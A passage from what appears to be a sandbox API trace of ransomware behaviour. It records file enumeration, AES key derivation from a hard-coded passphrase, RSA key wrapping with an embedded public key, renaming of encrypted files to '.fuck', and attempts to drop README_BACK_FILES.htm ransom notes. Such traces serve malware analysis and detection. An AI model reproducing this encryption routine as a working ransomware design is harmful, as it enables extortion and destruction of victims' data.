[0238.213] GetLastError () returned 0x5 [0238.213] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0238.213] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0238.223] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.224] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.224] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.224] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285b570) returned 1 [0238.226] CryptCreateHash (in: hProv=0x285b570, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.226] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.226] CryptHashData (hHash=0x27eaf10, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.226] CryptDeriveKey (in: hProv=0x285b570, Algid=0x6610, hBaseData=0x27eaf10, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ead90) returned 1 [0238.226] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.226] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.226] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285b5f8) returned 1 [0238.227] CryptImportPublicKeyInfo (in: hCryptProv=0x285b5f8, dwCertEncodingType=0x1, pInfo=0x2869ee8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869f18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869f20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eaed0) returned 1 [0238.227] CryptEncrypt (in: hKey=0x27eaed0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.227] CryptEncrypt (in: hKey=0x27eaed0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b790*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b790*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.227] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b790, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.227] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.227] CryptEncrypt (in: hKey=0x27ead90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.227] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.227] CloseHandle (hObject=0xffffffff) returned 1 [0238.227] CloseHandle (hObject=0xffffffff) returned 1 [0238.227] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), bFailIfExists=0) returned 0 [0238.227] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x0) returned 0 [0238.228] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg")) returned 0 [0238.228] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.fuck" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.fuck")) returned 0 [0238.228] CryptDestroyHash (hHash=0x27eaf10) returned 1 [0238.228] CryptDestroyKey (hKey=0x27ead90) returned 1 [0238.228] CryptReleaseContext (hProv=0x285b570, dwFlags=0x0) returned 1 [0238.228] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.228] FindClose (in: hFindFile=0x27ea8d0 | out: hFindFile=0x27ea8d0) returned 1 [0238.228] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm")) returned 0xffffffff [0238.229] AreFileApisANSI () returned 1 [0238.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 138 [0238.229] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.229] GetLastError () returned 0x5 [0238.229] GetLastError () returned 0x5 [0238.229] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.229] FindClose (in: hFindFile=0x27eacd0 | out: hFindFile=0x27eacd0) returned 1 [0238.229] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.229] AreFileApisANSI () returned 1 [0238.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 112 [0238.230] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.230] GetLastError () returned 0x5 [0238.230] GetLastError () returned 0x5 [0238.230] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.230] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.230] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\readme_back_files.htm")) returned 0xffffffff [0238.230] AreFileApisANSI () returned 1 [0238.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0238.230] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.231] GetLastError () returned 0x5 [0238.231] GetLastError () returned 0x5 [0238.231] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.231] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eac90 [0238.231] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.231] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.231] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.231] GetLastError () returned 0x5 [0238.231] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm")) returned 0x20 [0238.231] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x80) returned 0 [0238.231] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.232] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.232] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0238.232] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x285b570) returned 1 [0238.234] CryptCreateHash (in: hProv=0x285b570, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.234] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.234] CryptHashData (hHash=0x27eacd0, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.234] CryptDeriveKey (in: hProv=0x285b570, Algid=0x6610, hBaseData=0x27eacd0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x27ead50) returned 1 [0238.234] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.234] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.234] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x285b130) returned 1 [0238.235] CryptImportPublicKeyInfo (in: hCryptProv=0x285b130, dwCertEncodingType=0x1, pInfo=0x2869fb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869fe8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869ff0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27eaa50) returned 1 [0238.235] CryptEncrypt (in: hKey=0x27eaa50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.235] CryptEncrypt (in: hKey=0x27eaa50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285bb48*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x285bb48*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.235] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285bb48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.235] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.235] CryptEncrypt (in: hKey=0x27ead50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.235] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.235] CloseHandle (hObject=0xffffffff) returned 1 [0238.235] CloseHandle (hObject=0xffffffff) returned 1 [0238.235] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), bFailIfExists=0) returned 0 [0238.235] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x0) returned 0 [0238.236] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg")) returned 0 [0238.236] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.fuck" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.fuck")) returned 0 [0238.236] CryptDestroyHash (hHash=0x27eacd0) returned 1 [0238.236] CryptDestroyKey (hKey=0x27ead50) returned 1 [0238.236] CryptReleaseContext (hProv=0x285b570, dwFlags=0x0) returned 1 [0238.236] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.236] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.236] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.237] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\readme_back_files.htm")) returned 0xffffffff [0238.237] AreFileApisANSI () returned 1 [0238.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28572d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0238.237] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.237] GetLastError () returned 0x5 [0238.237] GetLastError () returned 0x5 [0238.237] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.237] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eac90 [0238.238] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.238] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.238] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.238] GetLastError () returned 0x5 [0238.238] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm")) returned 0x20 [0238.238] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x80) returned 0 [0238.238] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.239] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.239] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0238.239] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x285b928) returned 1 [0238.241] CryptCreateHash (in: hProv=0x285b928, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.241] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.241] CryptHashData (hHash=0x27ead50, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.241] CryptDeriveKey (in: hProv=0x285b928, Algid=0x6610, hBaseData=0x27ead50, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x27ead90) returned 1 [0238.241] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.241] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.241] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x285bac0) returned 1 [0238.242] CryptImportPublicKeyInfo (in: hCryptProv=0x285bac0, dwCertEncodingType=0x1, pInfo=0x286abe8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286ac18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286ac20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27eaf10) returned 1 [0238.242] CryptEncrypt (in: hKey=0x27eaf10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.242] CryptEncrypt (in: hKey=0x27eaf10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285bbd0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x285bbd0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.242] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285bbd0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.242] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.242] CryptEncrypt (in: hKey=0x27ead90, hHash=0x0, Final=1, dwFlags=0x0, 